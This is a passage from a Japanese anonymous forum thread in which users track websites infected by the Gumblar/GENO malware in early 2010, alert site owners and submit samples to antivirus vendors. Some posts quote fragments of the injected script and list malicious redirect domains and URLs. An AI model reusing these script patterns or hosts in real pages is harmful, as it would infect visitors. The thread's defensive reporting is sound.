URLリンク(gumblarchecker.crz.jp)
特定のウェブページを許可する項目を作りました

813:名無しさん@お腹いっぱい。
10/01/26 02:18:09
節子、それjavascriptやない

814:名無しさん@お腹いっぱい。
10/01/26 02:18:59
IE系だと、javascriptとActiveXだろうと

815:名無しさん@お腹いっぱい。
10/01/26 02:19:04
あなたチューブ

816:名無しさん@お腹いっぱい。
10/01/26 02:21:56
>>807
js(ジャバスクリプト)とActiveXの実行許可した?
jsとJAVAは全くの別物で、ようつべはJAVA多分関係ないよw

817:名無しさん@お腹いっぱい。
10/01/26 02:31:22
>>812
ようつべが見れました。ありがとう
しかし、相変わらず別の動画サイトは見れないorz

818:名無しさん@お腹いっぱい。
10/01/26 03:06:39
>>817
こんな程度で躓いているならあなたには無理。
現在感染していなくて>>6の対策がきちんとできているならそのままでいいよ。
現状で>>6以上の対策は掛け捨て確実な保険というか、自己満足や趣味の領域だから。

819:名無しさん@お腹いっぱい。
10/01/26 03:39:06


スレリンク(news板)

820:名無しさん@お腹いっぱい。
10/01/26 03:39:40
IEは8?

821:名無しさん@お腹いっぱい。
10/01/26 03:42:40
>>820
IE5です

822:名無しさん@お腹いっぱい。
10/01/26 03:44:25
釣り乙

823:名無しさん@お腹いっぱい。
10/01/26 03:46:04
>>822
マジレスなんだが・・・

824:名無しさん@お腹いっぱい。
10/01/26 06:02:23
2kか9xかどっちかか?

825:名無しさん@お腹いっぱい。
10/01/26 06:54:51
JavaScriptってレベルじゃねーぞ
URLリンク(www.chromeexperiments.com)

826:名無しさん@お腹いっぱい。
10/01/26 06:56:23
IE5ってOS9ですか?

827:名無しさん@お腹いっぱい。
10/01/26 06:57:46
JavaScriptってレベルじゃねーぞ
URLリンク(www.chromeexperiments.com)

828:名無しさん@お腹いっぱい。
10/01/26 06:59:15
JavaScriptってレベルじゃねーぞ
URLリンク(www.chromeexperiments.com)

829:名無しさん@お腹いっぱい。
10/01/26 07:06:09
誤爆スマソ

830:名無しさん@お腹いっぱい。
10/01/26 08:31:26
ヤフーのブリーフケースからファイルを取り出そうとしたら
ノートンがTrojan.Malscript!htmlで反応したんだけど
感染してんのかな?それとも誤検?

831:名無しさん@お腹いっぱい。
10/01/26 08:32:46
ノートンのサポートに訊けよ

832:名無しさん@お腹いっぱい。
10/01/26 09:53:43
誤爆ってレベルじゃねーぞ

833:名無しさん@お腹いっぱい。
10/01/26 15:47:48
>>830
virustotalに投げれば

834:名無しさん@お腹いっぱい。
10/01/26 16:16:45
激安通販アラジン(/*Exception*/)
URLリンク(toratomo)<)●sayurichan●com/

スニーカー通販(/*Exception*/)
momo-cafe●sunnyday●jp
トップページは403だが、該当ページにアクセス可能
/folder/sneaker
※ろりぽは事の重大さがわかってないらしい


調査に戻る..

835:名無しさん@お腹いっぱい。
10/01/26 16:34:15
truelifefamily.ru

836:名無しさん@お腹いっぱい。
10/01/26 17:32:10
ロリポとさくら大杉
というよりはロリポとさくらで調べて行ってるんだろうけどさ。

つーかロリポGMOだろ?
同じGMOのアイルでは「ガンブラー点検無償実施」とかやってるのに
つーかGMO自体がWebAlertってのやってんのに

やっぱ安物サーバーはこういう時にダメなんかねぇ。

837:名無しさん@お腹いっぱい。
10/01/26 17:50:23
ユーザー層がアレだからだと思ってたw

838:名無しさん@お腹いっぱい。
10/01/26 18:44:34
ExplorerにFTPのパス覚えさせてるような初心者が多いんだろう


839:名無しさん@お腹いっぱい。
10/01/26 19:50:22
>>834
上:ろりぽにつーほー
中:403
下:そこも403になってました。

840:名無しさん@お腹いっぱい。
10/01/26 20:33:44
   γ⌒ヽ
  < ・、,,,;;,)      ハ,,..,,ハ
  < つ=つ     /;;・ω・;;ヽ
  ノ   ノ三)     (;( ^^^ );)
∠、 m)=m)..    `'ー---‐´

 ガンブラー      トトロイ
(2009 ~ )      (2010 ~ )

841:名無しさん@お腹いっぱい。
10/01/26 20:40:54
kawaii

842:名無しさん@お腹いっぱい。
10/01/26 20:42:52
ハッカーってどうしてマウス使わないの?

843:名無しさん@お腹いっぱい。
10/01/26 21:01:00
>>782
他人に迷惑かけておいてスクロールしなければ見えないところに告知してんなよ。
自分のことしか考えていないクソ政治家が露呈しているわ。

844:名無しさん@お腹いっぱい。
10/01/26 21:02:29
>>843
ならば君が政治家になりたまえ

845:名無しさん@お腹いっぱい。
10/01/26 21:23:12
まぁ通知すらしない企業だってあるんだし

846:名無しさん@お腹いっぱい。
10/01/26 21:37:05
嫌な言い方

847:名無しさん@お腹いっぱい。
10/01/26 22:11:02
サッカーマガジンの旧ページ(今は移転告知と転送だけ)
URLリンク(soccer.hikaritv-bbm)●com/


848:名無しさん@お腹いっぱい。
10/01/26 22:16:20
 

849:名無しさん@お腹いっぱい。
10/01/26 22:56:15
>>847
whoisからべーすぼーるまがじんにめるしますた。

850:名無しさん@お腹いっぱい。
10/01/26 23:27:33
>>849,839
乙です


851:名無しさん@お腹いっぱい。
10/01/26 23:38:31
【セキュリティ】Gumblarの新しい亜種が突出、感染サイトの4割で検出(10/01/26)
スレリンク(pcnews板)

852:名無しさん@お腹いっぱい。
10/01/27 01:18:54
わざと感染して、いろんなところにFTPアクセスすれば
Gumblarも混乱するんじゃ?

853:名無しさん@お腹いっぱい。
10/01/27 01:22:16
>>852
全部書き換えられるのが落ち

854:名無しさん@お腹いっぱい。
10/01/27 01:48:42
GENOみたいにweb改竄で感染させて ハードディスクフォーマットさせるウイルスってあるの?

855:名無しさん@お腹いっぱい。
10/01/27 03:44:13
さくらオワタwww
URLリンク(www.google.com)
過去 90 日間に、このサイトの一部で不審な動きが 66 回報告されています。
Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 6048 ページのうち
241 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2010-01-26で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-26です。

不正なソフトウェアは (省略) を含む
135 個のドメインでホストされています。

(省略) を含む 20 個のドメインが、
このサイトの訪問者に不正なソフトウェアを
配布する媒体として機能しているようです。


ろりぽっぷ
URLリンク(www.google.com)

856:名無しさん@お腹いっぱい。
10/01/27 04:16:32
KKJサイトにおける不正改ざんについての状況報告とお願い
URLリンク(www.kkj.or.jp)
お詫びは良いけどさ・・・

>【GENOウイルスチェッカー】
>URLリンク(geno.2ch.tc)



マスゴミがGumblarと8080を混同して報道したのが原因だろうな。


857:名無しさん@お腹いっぱい。
10/01/27 05:35:31
>>856

ここもそうだよ
URLリンク(ameblo.jp)

なぜにブログで告知する…はおいといて

> ★ウィルス対策や駆除の方法
> ⇒コチラ のサイトに詳しく載っております。
>  所要時間はたったの5分です。

コチラ のサイト(どうしてそこ行く)
URLリンク(blog.ecstudio.jp)


858:名無しさん@お腹いっぱい。
10/01/27 05:41:07
新種の告知かな
URLリンク(www)●mag-x●com/


859:名無しさん@お腹いっぱい。
10/01/27 06:23:51
>>858
改ざんされてる?


860:名無しさん@お腹いっぱい。
10/01/27 06:33:32
糞チェッカーは糞

861:名無しさん@お腹いっぱい。
10/01/27 07:06:38
>>859
サイトリニューアル

> 年末年始にかけて2週間のサイト閉鎖を行い、さらに、1月22日から25日まで、
> 部分的にページが見られなくなっておりましたこと、深くお詫びいたします。
> その後システムの調査をしましたところ、会員情報に関しては、漏洩の事実
> が認められなかったことを、ここにご報告させていただきます。

ウイルス感染問題はウヤムヤ


862:名無しさん@お腹いっぱい。
10/01/27 07:56:35
>>861
レスありがとう

863:名無しさん@お腹いっぱい。
10/01/27 09:20:21
>>857
コメントにSo-netセキュリティ通信のURLでも書いておこうかと思ったけど

>お互いに「アナログ人間万歳☆」ですね?!

これみて萎えた。

864:名無しさん@お腹いっぱい。
10/01/27 10:02:22
知能テストに見せかけHDDのデータを破壊、危険なワームが拡大
HDDの重要な部分を破壊してしまう新手のワーム「Zimuse」が世界各地で感染を広げているという。
2010年01月27日 08時09分 更新
URLリンク(www.itmedia.co.jp)

Web知能テストに見せかけHDDのデータを破壊する粋なウィルスが登場
スレリンク(news板)

865:856
10/01/27 14:25:59
>>857
>コチラ のサイト(どうしてそこ行く)
>URLリンク(blog.ecstudio.jp)

このブログ自体は既出だが・・・
Java(JRE)の事が抜けてるから、環境次第では穴が空いたままになる可能性がw

URLリンク(minkara.carview.co.jp)
何故か人気がある社長の糞ブログwww

さすがみんカラー
※みんな頭カラッポ=略して「みんカラ」


866:名無しさん@お腹いっぱい。
10/01/27 14:42:54
>>865
そのブログにコメント出してたら消されてるなw

867:名無しさん@お腹いっぱい。
10/01/27 15:30:37
T-fal(ティファール)ウェブサイトご利用のみなさまへ

いつもT-falのウェブサイトをご利用くださいましてありがとうございます。
現在サイト内において、ページによって表示されにくい個所がございます。
ただ今改善の作業を進めておりますが、完全な復旧まで今しばらくお待ち
いただけます様、よろしくお願い申し上げます。

株式会社 グループセブ ジャパン

URLリンク(www.t-fal.co.jp)

ここのサイトも感染したのかな?


868:名無しさん@お腹いっぱい。
10/01/27 15:58:24
>※みんな頭カラッポ=略して「みんカラ」

ワロタ
オカルトグッズが蔓延するサイトだからなぁ・・・

869:名無しさん@お腹いっぱい。
10/01/27 16:02:06
ソースに記載のある
/krups/js/xtplugar.js
/krups/js/xtplug.js
が404になってる。改ざんされて消したのかもね。


870:名無しさん@お腹いっぱい。
10/01/27 16:20:33
>>867
DoS攻撃くらってテンポってるだけじゃね?

【調理器具】ティファールの鍋、取っ手外れやけど 同様の事故3件 [10/01/26]
スレリンク(bizplus板)

871:名無しさん@お腹いっぱい。
10/01/27 16:41:20
BLOGって感染しないよね

872:名無しさん@お腹いっぱい。
10/01/27 16:47:47
ティファールは前にも改ざんされたからね

873:名無しさん@お腹いっぱい。
10/01/27 16:48:59
>>871
SQLインジェクション

あ、トレンドマイクロ的な意味じゃなくて

874:名無しさん@お腹いっぱい。
10/01/27 17:22:52
これはひどい(アフィ的な意味で)
symantecgam.seesaa.net

875:人柱になりたい人 ◆sage/xLnlI
10/01/27 17:31:35
WindowsXP
Windows98
Ubuntu 9.10

どれがいいんだろう

876:名無しさん@お腹いっぱい。
10/01/27 17:34:28
>>875
Windows95

877:名無しさん@お腹いっぱい。
10/01/27 17:34:55
URLリンク(www)●mv-tokai●com/

nortonのアドオンが検出
これは改竄ですかね?(もしくは過去に改竄されていた?)

878:人柱になりたい人 ◆sage/xLnlI
10/01/27 17:37:53
>>876
持ってない
よし、Windows98(アンチウイルスソフトなし)で踏んでこよう

879:名無しさん@お腹いっぱい。
10/01/27 17:40:42
>>877
ざっと見た限りでは、少なくとも今は改竄は無いっぽい
キャッシュ見て来ます

880:名無しさん@お腹いっぱい。
10/01/27 17:43:04
1月12日に「お詫びとお知らせ」pdfファイルがあった

スナック菓子に針1本混入だった

881:877
10/01/27 17:44:50
malscript扱いになってるけどキャッシュのどこかに反応したっぽい
トップページでは出ないっす

882:879
10/01/27 17:52:30
GoogleとBingのキャッシュ見たけどよく分からんかった
どこにひっかかってるんだろう…aguseでも反応無いけど

883:名無しさん@お腹いっぱい。
10/01/27 17:59:03
>>882
今確認してみたらyahooのキャッシュでTrojan.Malscript!htmlと出ました

884:名無しさん@お腹いっぱい。
10/01/27 18:04:16
あれ・・これは
ページ関係なしにyahoofs.jp(yahooのキャッシュ)自体が反応しているみたいだけど
これはnortonの駄目機能の誤爆かな
吊ってこようorz

885:名無しさん@お腹いっぱい。
10/01/27 18:05:35
>>830

886:名無しさん@お腹いっぱい。
10/01/27 18:05:54
カスペがGoogleに喧嘩売ったと思ったら
今度はノートンがYahoo!に喧嘩売ったのかw

887:名無しさん@お腹いっぱい。
10/01/27 18:08:18
カスペは即日修正したがノートンは違うな

888:名無しさん@お腹いっぱい。
10/01/27 18:13:30
まぁ24時間は様子見ようぜ。
あっちのYahoo!とYahoo!Japanとでスクリプト等が異なると対応は遅くなるだろうな。

889:人柱になりたい人 ◆sage/xLnlI
10/01/27 18:16:53
Trojan.Malscript!htmlでググるとこんなんでました

URLリンク(www.virustotal.com)



890:名無しさん@お腹いっぱい。
10/01/27 18:31:59
ノートンのネーミングは相当アバウトっつーか広範囲すぎるので
それでググってもあまり意味ないぞ

891:名無しさん@お腹いっぱい。
10/01/27 18:34:26
>>874
URLリンク(search.yahoo.co.jp)

確かに酷い
そしてSEOが出来てる訳でもない

892:名無しさん@お腹いっぱい。
10/01/27 18:57:05
>>884
なに?よく分からないけどヤフーのトップページ見ただけでもノートン反応するって事?
俺のNIS2009は何も反応しないけど

893:名無しさん@お腹いっぱい。
10/01/27 19:10:20
>>892
反応するのはyahooのキャッシュ鯖
検索したページをキャッシュ表示すると出る

894:名無しさん@お腹いっぱい。
10/01/27 19:15:27
>>858-859,>>861-862
リアルタイムで感染中だお。/*Exception*/
URLリンク(www.aguse.jp)

895:名無しさん@お腹いっぱい。
10/01/27 19:19:52
>>893
ありがとう、何も反応しないや、おかしいな

896:名無しさん@お腹いっぱい。
10/01/27 19:26:32
>>895
NIS2010は2009のマイナーバージョンアップに見えて全くの別物仕様だからね
ただ現状の最新エンジンには環境依存の不具合があってうざい事この上ない

897:名無しさん@お腹いっぱい。
10/01/27 20:23:47
>>894
これだけ感染を繰り返すのは更新に使用しているパソコンからウィルス駆除してないんじゃないのか。あとサーバレンタル元に連絡して一時閉鎖とかの対応取って貰うとかしないと駆除と感染のいたちごっこが続きそう

898:名無しさん@お腹いっぱい。
10/01/27 20:49:25
ttp●//kousyu●cool●ne●jp/

MSEで"Trojan:JS/Redirector.BQ"と出たがGumblar?

899:名無しさん@お腹いっぱい。
10/01/27 20:51:48
>>898
/*Exception*/

900:名無しさん@お腹いっぱい。
10/01/27 21:01:49
>>899 thx

MyJVN バージョンチェッカで各ソフトは最新になってるけど大丈夫かな・・・

901:名無しさん@お腹いっぱい。
10/01/27 21:44:54
口唇ヘルペスの治療や症状
www●pdmounted●com

リアルに感染中/*Exception*/

902:名無しさん@お腹いっぱい。
10/01/27 21:49:29
>>898
めるした。

>>897
言いだしっぺの法貝リ
お願いします。m(_ _)m

903:名無しさん@お腹いっぱい。
10/01/27 22:18:03
>>901
whoisからめるしました。

904:名無しさん@お腹いっぱい。
10/01/27 22:36:57
Gumblar蔓延の要因の一つは感染サイトの告知の中の
トレンドマイクロのオンラインシュキャンの進めにあると思われます

トレンドマイクロの営利主義と感染サイトの告知が
感染PCを安全としGumblar蔓延を促進しているのではなかろうかと

PCデポでは無料診断と称してトレンドマイクロのオンラインシュキャンを行っていますが
これは、PCデポとトレンドマイクロの密接な繋がり上行われているものであり
安易にユーザに間違った安心感だけを与えているいるだけかと

PCがGumblarに感染しているか否かを真剣に診断しているとは
断じて言えるものでは無いのだとw

905:名無しさん@お腹いっぱい。
10/01/27 22:39:10
シュキャンorz

906:名無しさん@お腹いっぱい。
10/01/27 22:41:09
シュキャンダル

907:名無しさん@お腹いっぱい。
10/01/27 22:48:36
>>897
パスワードすら変えてないんじゃないの。

しかし感染を告知しないで有料会員に感染者がいたらどうする気なんだろう。
気がつかずにいたら余計に被害が出るかもしれないのにいろんな意味で凄いわ。

908:名無しさん@お腹いっぱい。
10/01/27 22:58:47
>>907
ソネットも見直してほしい…
URLリンク(www.so-net.ne.jp)

>>25,>>52
/*LGPL*/がまだ残ってる。。。
URLリンク(www.aguse.jp)

909:名無しさん@お腹いっぱい。
10/01/27 23:26:30
ニュースでHPが改竄されたって言ってるじゃん。
あれって本当なの?
ハッカーが直接アクセスして改竄してるの?
てっきりウイルスがHP管理者のPCから勝手に
改竄してるんだと思ってたんだけど。

910:名無しさん@お腹いっぱい。
10/01/27 23:29:05
ウイルスバスターのファイルスキャンで安心とか、アホだろ・・・
いや、うちのサイトのせいで、感染していないと言い張るためにわざとなのか?

911:名無しさん@お腹いっぱい。
10/01/27 23:49:17
>>909
本当
直接アクセスって意味がわかってないと思うけどFTPで直接
管理者のPCがウイルス感染してることも事実だけどそこから改ざんではないです

912:名無しさん@お腹いっぱい。
10/01/28 00:11:43
>>911
うむうむ。
改竄の原因はウイルスではないのね。

913:名無しさん@お腹いっぱい。
10/01/28 03:05:57
埋め込まれるスクリプトでコメント無しのがあるそうで
<script> try{window.onload=function(){document.write('<div id=megaid>

で、このへんに飛ばされるらしい
extrafreeweb.ru
limowebcam.ru
supernetbet.ru
topmediasite.ru
yourtopfilms.ru

914:名無しさん@お腹いっぱい。
10/01/28 03:30:26
それで突かれる脆弱性は何?
先週のIEのを含めて既知のものというか、普通にアップデートを怠らなければ問題ないのなら
コードの変更みたいな些事はもうどうでもいいよ。

915:名無しさん@お腹いっぱい。
10/01/28 03:50:13
勝手に仕切るなw

916:名無しさん@お腹いっぱい。
10/01/28 03:53:03
普通にアップデートを怠らなければ問題ない

917:名無しさん@お腹いっぱい。
10/01/28 04:06:53
>>916
フツーはそうなんだけど今回アドビがねぇ。
0-day発覚から一ヶ月放置。
そのせいだろ今回の騒動は。

918:名無しさん@お腹いっぱい。
10/01/28 04:14:43
アドビのjavascriptなんかデフォルトで無効にしとけっての

919:名無しさん@お腹いっぱい。
10/01/28 06:46:27
感染したら
netstat -ap tcp 10
で監視できないのかな

920:名無しさん@お腹いっぱい。
10/01/28 07:41:10
>>914
ソース見てコードないの確認してからNS許可してるんで、変更情報は自分には重要。

921:名無しさん@お腹いっぱい。
10/01/28 09:17:45
>>908
askul代理店、まだ残ってんのか。
LGPL...

922:名無しさん@お腹いっぱい。
10/01/28 10:15:09
新しい?
<script> try{window.onload=function(){document.write('<div id=megaid>addictinggames-com.z5x.ne</div>');以下長文略

923:922
10/01/28 10:17:46
これに掛かると、サイトは真っ白になって
addictinggames-com.z5x.neとだけ表示される

924:名無しさん@お腹いっぱい。
10/01/28 11:08:08
>>916
「普通にアップデート」したら、913のスクリプトが動かなくなるの?
それとも、このスクリプトの飛び先にある毒から守られるの?

925:名無しさん@お腹いっぱい。
10/01/28 11:09:52
/*・・・*/無し最新型はDEBUG(仮称)と記す

伊豆諸島/伊豆大島/大島町/TOP/総合情報(DEBUG)
URLリンク(park5)<)●co●jp/index●html

RONI大好きサイト(Exception)
URLリンク(roni)<)●roselog●net/

テレ東アニメDVD通販情報(たぶんDEBUG)
URLリンク(anime)<)●2pg●in/suzukiucar/index2●html
※コードまる見えw

各所につーほヨロ
また潜りに逝ってくる・・・

926:名無しさん@お腹いっぱい。
10/01/28 11:18:05
価格比較 GIOS ジオス(崩壊仕様)
URLリンク(shop)●relax-living●net
※/bike11/にGNU GPL

エラー崩壊は新コードの挿入ミスかな?


927:名無しさん@お腹いっぱい。
10/01/28 11:26:29
>>925
大田鋼業株式会社

電話に出たババア
「私たちにはそんなことは分かりません」とガチャ切り w

928:名無しさん@お腹いっぱい。
10/01/28 11:44:14
>>927
マジかwひでぇ会社だw

929:名無しさん@お腹いっぱい。
10/01/28 11:50:57
>>927
ふいたwwww

930:名無しさん@お腹いっぱい。
10/01/28 11:51:13
>>927
ちょwww

931:名無しさん@お腹いっぱい。
10/01/28 11:56:43
従業員10名の零細企業だからそんなもんだろ

932:名無しさん@お腹いっぱい。
10/01/28 11:57:01
>>864
エストニアのESET?

933:名無しさん@お腹いっぱい。
10/01/28 11:57:34
社内ネットワーク内のPCからFTPでアップロードしている場合、
そのPCが感染して無くても他のPCが感染してたらパス抜かれる?

934:名無しさん@お腹いっぱい。
10/01/28 12:10:33
>>931
だからってガチャ切りは普通しないだろ

935:名無しさん@お腹いっぱい。
10/01/28 12:13:19
詐欺とか思われたんだろ
aguseで調べるとタイムアウトだらけだ

936:名無しさん@お腹いっぱい。
10/01/28 12:26:58
大田鋼業株式会社(笑)のコードだが

URLリンク(counterbest)<)●ru:8080/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/

この認識で良いのかな?

937:名無しさん@お腹いっぱい。
10/01/28 12:30:07
闇金業者の融資だと思われたんだな

938:名無しさん@お腹いっぱい。
10/01/28 12:41:31
例どんな相手でも普通の企業でガチャ切りなんてありえん

939:名無しさん@お腹いっぱい。
10/01/28 13:03:43
立て続けに何人もの「善意の第三者」から掛かってきていたとか

940:名無しさん@お腹いっぱい。
10/01/28 13:10:43
KDDIのマイライン勧誘電話はガチャ切りしてる。
そうしないと延々喋り続けるから。

941:名無しさん@お腹いっぱい。
10/01/28 14:32:18
いやいや町工場とか土建屋なんかそんな対応がデフォだぞ

942:名無しさん@お腹いっぱい。
10/01/28 15:10:44
つーか、もうNoScriptのホワイトリストとかIEの信頼済ゾーンとか意味ない感じだよな。
一時許可だけは含めた全拒否か、突かれる穴だけを埋めて全許可の二択だわ。

943:名無しさん@お腹いっぱい。
10/01/28 15:26:24
信じられぬと 嘆くよりも
サイトを信じて 感染するほうがいい~

944:名無しさん@お腹いっぱい。
10/01/28 15:27:31
それはない。

945:名無しさん@お腹いっぱい。
10/01/28 15:29:20
求めないで 対策なんか
臆病者の 言いわけだから~

946:名無しさん@お腹いっぱい。
10/01/28 15:40:05
あると思います。

947:名無しさん@お腹いっぱい。
10/01/28 15:43:27
>>942
おれもそう思って、NoScriptをアンインストールした
そうしたら、FireFoxがけっこう軽くなったよw
穴を詰めておいて、これは絶対やばいだろと思うところは
仮想環境で行くことにした
で、最近のメインンブラウザはチョロメになってる

948:名無しさん@お腹いっぱい。
10/01/28 15:44:30
かっけっすね

949:名無しさん@お腹いっぱい。
10/01/28 15:50:18
外向き8080遮断でいいんじゃねーの?

950:名無しさん@お腹いっぱい。
10/01/28 15:51:44
>>922と全く同じコードが埋め込まれてたんだが(もう復旧済み)
これって表示するだけでウイルスやバックドア感染はしないの?

951:名無しさん@お腹いっぱい。
10/01/28 15:55:11
穴があれば感染する。

952:名無しさん@お腹いっぱい。
10/01/28 15:57:34
俺のアナルはゆるゆるだ

953:名無しさん@お腹いっぱい。
10/01/28 15:58:21
>>951
ありがとう…先方に警告出すわ…
コード解析しても意味ないのかな。仕方がいまいち分からん
先方の鯖管が報告してればいいけど

954:名無しさん@お腹いっぱい。
10/01/28 16:05:22
>>925
izushichi めるしました。
oota 直っているようです。ぐぐるキャッシュに/*LGPL*/
roni、test roselog●netは全滅か?、whoisからめるしました。
sunrise●2pg リンク先はみなかったことにして、whoisからめるしました。

955:名無しさん@お腹いっぱい。
10/01/28 16:14:09
>>922
>>950
みたいに画面真っ白表示するのってなんだろう
感染してるってブラウザで丸わかりじゃ意味ないんじゃないのかな?
愉快犯ってことなのかな

956:名無しさん@お腹いっぱい。
10/01/28 16:18:24
真っ白表示された時点で(穴があれば)感染しているから目的は達成されるだろ。
愉快犯ってことにして閲覧者には無害ですとかアナウンスしたいのかもしれんが
覚悟決めろや。

957:名無しさん@お腹いっぱい。
10/01/28 16:28:43
いやいや、普通ならなるべく多く感染させたいから隠すだろ
感染させてやったって表示してるんだから愉快犯(反応を楽しむ)なんじゃね

当然感染もするけどな

958:名無しさん@お腹いっぱい。
10/01/28 16:30:09
愉快犯=実害がないわけじゃないだろjk

959:名無しさん@お腹いっぱい。
10/01/28 16:31:37
>>926
whoisからめるしました。
飛び先は同じなのでコードの貼り付け失敗かも

960:名無しさん@お腹いっぱい。
10/01/28 16:37:51
ウィルス作る奴が何考えてるかなんてわからねーよ

961:名無しさん@お腹いっぱい。
10/01/28 16:45:44
自サイト感染してた知人、ページ復旧してもう安心な気持ちになってる。
話突っ込んだけどもう元に戻したしって危機感もってないみたい。
いや感染してたら危ないって!って言っていいんだよね?
何故あんなに自信満々なんだ……

962:名無しさん@お腹いっぱい。
10/01/28 16:57:19
お前の説明がヘタクソだから

963:名無しさん@お腹いっぱい。
10/01/28 17:01:10
>>927
吹いた

964:名無しさん@お腹いっぱい。
10/01/28 17:04:54
>>961
知人ともども、so-netの記事を読んでみるといいと思う
このへんとか
URLリンク(www.so-net.ne.jp)

965:名無しさん@お腹いっぱい。
10/01/28 17:05:39
sunrise●2pg●inは
<!--<script>--> (省略) <!--</script>-->
になってるのは何なんだろw

966:名無しさん@お腹いっぱい。
10/01/28 17:07:45
superhighest.ru:DEBUG ってなんだよw

967:名無しさん@お腹いっぱい。
10/01/28 17:12:34
DEBUGだけにまだ試行中なんだよ

968:名無しさん@お腹いっぱい。
10/01/28 17:13:59
>>966
(/DEBUG/g, '8080')

969:名無しさん@お腹いっぱい。
10/01/28 17:27:05
>>965
たぶんだけど、やられたことは知っていて
証拠保全とか何か理由があってコメントアウトしたんじゃないかな。

970:名無しさん@お腹いっぱい。
10/01/28 17:56:16
>>922 >>950
これって新しいやつ?報告見たことないけど

971:名無しさん@お腹いっぱい。
10/01/28 17:58:31
>>970
新しいやつ
>>925のDEBUGで報告されてる

972:名無しさん@お腹いっぱい。
10/01/28 18:00:01
ローカルの8080ポートを閉じるのって効果があるの?
リダイレクト先にロシアサーバの8080ポートが使われるってだけで、ローカルの8080ポートは
関係ないと思っていたけど違うのかな?

973:名無しさん@お腹いっぱい。
10/01/28 18:09:50
>>933
ぬかれる

974:名無しさん@お腹いっぱい。
10/01/28 18:11:41
>>972
ない

975:名無しさん@お腹いっぱい。
10/01/28 18:15:49
>>970
この記事にあるコードがそうだと思う
URLリンク(www3.atword.jp)

976:名無しさん@お腹いっぱい。
10/01/28 18:34:37
DEBUG型、未だどこも検知せず…orz
URLリンク(www.virustotal.com)

avastには提出しました。他のもよろしく

977:名無しさん@お腹いっぱい。
10/01/28 18:48:10
>>976
スレリンク(sec板:329番)
で、やってるっぽい

978:名無しさん@お腹いっぱい。
10/01/28 18:57:33
>>972
ローカル8080開けてるヤツなんてそんないないからな

979:名無しさん@お腹いっぱい。
10/01/28 19:56:51
提出した人はうpロダに物を上げてもらえんか?
対応してないAVソフトのユーザーは、それ使って検体の提出ができるからさ

980:名無しさん@お腹いっぱい。
10/01/28 20:04:35
>>976
>>925izushichiの分
かすぺ @返信日時:17:34
> Hello,
>
> index.htm_, mikura_index.html_, oshima_index.html_, toshima_index.html_ - Trojan.JS.Agent.bcb
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Please quote all when answering.
> The answer is relevant to the latest bases from update sources.
> --
> Best regards, Sergey Prokudin
> Virus analyst, Kaspersky Lab.

ESET @返信日時:19:00
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> index.htm - JS/TrojanDownloader.Agent.NRP trojan
> mikura_index.html - JS/TrojanDownloader.Agent.NRP trojan
> oshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
> toshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
>
> Regards,
>
> Daniel Novomesky
> Virus Researcher
> ESET spol. s r.o.

981:名無しさん@お腹いっぱい。
10/01/28 20:18:43
>>925gyomu-yoの分
Fortinet @返信日時:16:09 (あちらの時刻かも。)
> Dear Customer,
>
> Thank you for submitting the sample to Fortinet. We have recently added detection for this malware. The signature will be included in the next regular update.
>
> The sample you submitted will be detected as follows:
> index.html - JS/IFrame.FAC!tr
>
> Best Regards,
> AV Lab - Bob

982:名無しさん@お腹いっぱい。
10/01/28 20:20:24
>>981補足
anime●gyomu-yo●netではなくgyomu-yo●netです。

983:名無しさん@お腹いっぱい。
10/01/28 20:43:39
次スレは重複したここでいいのか?

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
スレリンク(sec板)

984:名無しさん@お腹いっぱい。
10/01/28 20:49:42
>>922
それ今朝やられた。自分とこの場合、一瞬正規のページが表示された後に、nhl-com.stc.com.sa.googleと表示。
avast!で検出されず、aguseで調べたら、「ガブンラー感染の恐れあり」。
今年に入って、これで2回目です。
前回はユーザーからメールと電話で報告を受け、今回は運良く自分で見つけたけど、これって、FTPのパスワードとかの
設定変えたほうがいいのかな?ちなみに鯖はXREAですw

985:名無しさん@お腹いっぱい。
10/01/28 20:50:17
>>984
ぉぃw

986:名無しさん@お腹いっぱい。
10/01/28 20:50:50
毎日変えろ糞が

987:名無しさん@お腹いっぱい。
10/01/28 20:53:49
改ざんされたソース保存してて、ブラウザで閲覧してもまだavast!では検出されませんね。
反映されるまで時間かかるのかな?

988:925
10/01/28 20:55:53
検索ワード:".replace(/\(|#|@|&|\^|\$|\)|\!/ig,"

・やふー
URLリンク(search.yahoo.co.jp)

・えきさいと
URLリンク(www.excite.co.jp)

つーほしてくれた人>乙です

989:名無しさん@お腹いっぱい。
10/01/28 20:55:56
987=984です。

>>986
パスワードの変更の仕方がよくわからんのよ

990:984
10/01/28 21:03:06
>>988
けっこう改ざんされてるとこあるんだね。通報してくれた人本当に乙です

991:名無しさん@お腹いっぱい。
10/01/28 21:06:28
>>988
その中から探してきてくれたあなたこそ乙ですぽ。

992:名無しさん@お腹いっぱい。
10/01/28 21:07:31
>>988
J U M P E R Z . N E T - BBS -
感染のオンパレードわろた

993:名無しさん@お腹いっぱい。
10/01/28 21:07:46
>>984
XREAってこれのこと?
URLリンク(www.so-net.ne.jp)

994:984
10/01/28 21:09:00
パスワード変更の方法が分かりました。これからは定期的にパスワード変更します。

995:名無しさん@お腹いっぱい。
10/01/28 21:09:23
次スレ誘導
スレリンク(sec板)
※このスレが重複したやつだが気にすんな

996:984
10/01/28 21:12:40
>>993
今回の改ざんはそうかもしれないですね。でも前回は、今月の中旬頃でした

997:名無しさん@お腹いっぱい。
10/01/28 21:15:26
>>996
OSのクリーンインストールもしてね。

998:名無しさん@お腹いっぱい。
10/01/28 21:20:49
So-net 三つの謎
※中の人ねらー疑惑
※何故マカフィーなのか
※中の人は美少女なのかオサーンなのか

999:名無しさん@お腹いっぱい。
10/01/28 21:23:41
>>998
3番目が最重要だにゃ。

↓1000どぞー

1000:名無しさん@お腹いっぱい。
10/01/28 21:24:09
>※中の人は美少女なのかオサーンなのか
これだけは判る、きっとオサーンなのだw

1000ゲト!

1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


最新レス表示
レスジャンプ
類似スレ一覧
